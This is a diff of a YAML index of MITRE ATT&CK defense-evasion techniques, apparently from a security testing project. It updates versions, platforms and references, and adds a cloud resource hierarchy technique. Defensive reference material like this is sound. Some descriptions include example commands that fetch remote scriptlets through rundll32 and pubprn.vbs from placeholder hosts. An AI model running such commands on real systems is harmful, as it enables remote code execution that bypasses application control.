-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
